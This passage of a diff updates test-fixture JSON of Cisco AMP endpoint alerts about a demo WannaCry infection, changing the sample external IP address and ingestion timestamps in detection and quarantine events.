Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461515400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229327140847658\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -936,7 +936,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -977,7 +977,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -987,8 +987,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103739790Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461521100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -1008,7 +1008,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1054,7 +1054,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1071,8 +1071,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103741830Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461526200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":870000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229327140847671\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1094,7 +1094,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -1153,7 +1153,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -1170,8 +1170,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103743884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", + "ingested": "2021-12-09T13:35:51.461531900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847666\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5748,\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\",\"sha1\":\"ee8cbf12d87c4d388f09b4f69bed2e91682920b5\",\"md5\":\"ad7b9c14083b52bc532fba5948342b98\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -1193,7 +1193,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -1254,7 +1254,7 @@
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1271,8 +1271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103745931Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", + "ingested": "2021-12-09T13:35:51.461537700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":667000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":4772,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1294,7 +1294,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -1353,7 +1353,7 @@
 "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1370,8 +1370,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103748099Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461543700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229327140848000,\"timestamp\":1610635264,\"timestamp_nanoseconds\":28000000,\"date\":\"2021-01-14T14:41:04+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229327140847656\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -1393,7 +1393,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -1456,7 +1456,7 @@
 "e889544aff85ffaf8b0d0da705105dee7c97fe26"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1473,8 +1473,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103750142Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", + "ingested": "2021-12-09T13:35:51.461549500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229322845880000,\"timestamp\":1610635263,\"timestamp_nanoseconds\":950000000,\"date\":\"2021-01-14T14:41:03+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -1496,7 +1496,7 @@
 }
 ],
 "connector_guid": "test_connector_guid",
- "external_ip": "8.8.8.8"
+ "external_ip": "81.2.69.144"
 },
 "file": {
 "parent": {
@@ -1541,7 +1541,7 @@
 "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -1551,8 +1551,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103752188Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411488666497057000,\"timestamp\":1610635060,\"timestamp_nanoseconds\":913000000,\"date\":\"2021-01-14T14:37:40+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411488666497056775\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not 